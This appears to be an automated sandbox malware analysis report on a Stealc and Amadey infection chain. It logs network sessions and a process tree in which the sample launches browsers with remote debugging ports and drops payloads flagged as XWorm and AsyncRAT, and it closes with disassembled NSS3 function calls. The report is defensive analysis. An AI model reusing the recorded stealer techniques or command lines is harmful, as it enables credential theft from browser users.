2024-12-07 12:00:20 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.7	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:22 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:22 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:22 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: d011e298-d01e-0066-630e-48ea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120022Z-r1cf579d7789trgthC1EWRkkfc00000002v0000000004y56 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:22 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.7	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:22 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:22 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:22 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: e9c8fd08-f01e-003f-7806-48d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120022Z-r1cf579d778mvsklhC1EWRkavg00000002ng000000000d30 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:22 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.7	49877	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:22 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:22 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:22 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 755dc25f-d01e-008e-7004-48387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120022Z-r1cf579d778w59f9hC1EWRze6w00000002h00000000028vx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:22 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Target ID:	0
Start time:	06:59:06
Start date:	07/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfc0000
File size:	5'277'184 bytes
MD5 hash:	2704B8659485A783C81F96440F2F5CA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:59:17
Start date:	07/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:59:17
Start date:	07/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2840,i,13733945476958162739,14775988417437195856,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:59:29
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:59:29
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2424,i,11967223973417229962,6328825183861097206,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:59:29
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:10:02
Start date:	07/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2160,i,15529322534774427981,4503819060764799590,262144 /prefetch:3
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:10:36
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\AAAAECGHCB.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:10:36
Start date:	07/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:10:36
Start date:	07/12/2024
Path:	C:\Users\user\Documents\AAAAECGHCB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\AAAAECGHCB.exe"
Imagebase:	0x540000
File size:	3'250'176 bytes
MD5 hash:	8EFB48F6DD50828EA9F89FE49C923C17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.1869616191.0000000000541000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:10:39
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x240000
File size:	3'250'176 bytes
MD5 hash:	8EFB48F6DD50828EA9F89FE49C923C17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.1908666630.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:10:39
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x240000
File size:	3'250'176 bytes
MD5 hash:	8EFB48F6DD50828EA9F89FE49C923C17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.1908076388.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:11:00
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x240000
File size:	3'250'176 bytes
MD5 hash:	8EFB48F6DD50828EA9F89FE49C923C17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.2504021712.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	08:11:13
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1012933001\qk4EiZw.exe"
Imagebase:	0x1c0000
File size:	1'737'216 bytes
MD5 hash:	7006F5208C072600F4DC6B5FC302229D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2518875337.0000000005395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	08:11:22
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Imagebase:	0x530000
File size:	1'868'288 bytes
MD5 hash:	8D608898B8BB1E2E97BE0FAA61584F2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:11:35
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe"
Imagebase:	0xbe0000
File size:	5'277'184 bytes
MD5 hash:	2704B8659485A783C81F96440F2F5CA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:11:43
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1012944001\e0da62c8af.exe"
Imagebase:	0x630000
File size:	973'312 bytes
MD5 hash:	5EB4AF9A47B9E2F7B74E7E02AF5C444A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 24%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	08:11:43
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Imagebase:	0x530000
File size:	1'868'288 bytes
MD5 hash:	8D608898B8BB1E2E97BE0FAA61584F2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 6CE96E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CFE2120,6CE97E60), ref: 6CE96EBC
TlsGetValue.KERNEL32 ref: 6CE96EDF
EnterCriticalSection.KERNEL32(?), ref: 6CE96EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CE96F25

Part of subcall function 6CE6A900: TlsGetValue.KERNEL32(00000000,?,6CFE14E4,?,6CE04DD9), ref: 6CE6A90F
Part of subcall function 6CE6A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CE6A94F

PR_Unlock.NSS3 ref: 6CE96F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CE96FA9
TlsGetValue.KERNEL32 ref: 6CE970B4
EnterCriticalSection.KERNEL32(?), ref: 6CE970C8
PR_CallOnce.NSS3(6CFE24C0,6CED7590), ref: 6CE97104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE97117
SECOID_Init.NSS3 ref: 6CE97128
PORT_Alloc_Util.NSS3(00000057), ref: 6CE9714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE9717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE971A9
PR_NotifyAllCondVar.NSS3 ref: 6CE971CF
PR_Unlock.NSS3 ref: 6CE971DD
free.MOZGLUE(?), ref: 6CE971EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE97208
free.MOZGLUE(00000000), ref: 6CE97221
free.MOZGLUE(00000001), ref: 6CE97235
TlsGetValue.KERNEL32 ref: 6CE9724A
EnterCriticalSection.KERNEL32(?), ref: 6CE9725E
PR_NotifyCondVar.NSS3 ref: 6CE97273
PR_Unlock.NSS3 ref: 6CE97281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CE97291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE972B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE972D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE972E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE97372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CFD0148,,defaultModDB,internalKeySlot), ref: 6CE974CC
free.MOZGLUE(00000000), ref: 6CE97513
free.MOZGLUE(00000000), ref: 6CE9751B
free.MOZGLUE(00000000), ref: 6CE97528
free.MOZGLUE(00000000), ref: 6CE9753C
free.MOZGLUE(00000000), ref: 6CE97550
free.MOZGLUE(00000000), ref: 6CE97561
free.MOZGLUE(00000000), ref: 6CE97572
free.MOZGLUE(00000000), ref: 6CE97583
free.MOZGLUE(00000000), ref: 6CE97594
free.MOZGLUE(00000000), ref: 6CE975A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CE975BD
free.MOZGLUE(00000000), ref: 6CE975C8
free.MOZGLUE(00000000), ref: 6CE975F1
PR_NewLock.NSS3 ref: 6CE97636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CE97686
PR_NewLock.NSS3 ref: 6CE976A2

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CE976B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CE97707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CE9771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CE97731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CE9774A
DeleteCriticalSection.KERNEL32(?), ref: 6CE97770
free.MOZGLUE(?), ref: 6CE97779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE9779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE977AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CE977C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE977DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CE97821
PORT_Alloc_Util.NSS3(?), ref: 6CE97837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CE9785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE9786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CE978AC
free.MOZGLUE(00000000), ref: 6CE978BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CE978F3
free.MOZGLUE(00000000), ref: 6CE978FC
free.MOZGLUE(00000000), ref: 6CE9791C

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

Strings

,defaultModDB,internalKeySlot, xrefs: 6CE9748D, 6CE974AA
dbm:, xrefs: 6CE97716
NSS Internal Module, xrefs: 6CE974A2, 6CE974C6
rdb:, xrefs: 6CE97744
dll, xrefs: 6CE9788E
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CE974C7
Spac, xrefs: 6CE97389
kbi., xrefs: 6CE97886
extern:, xrefs: 6CE9772B
sql:, xrefs: 6CE976FE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
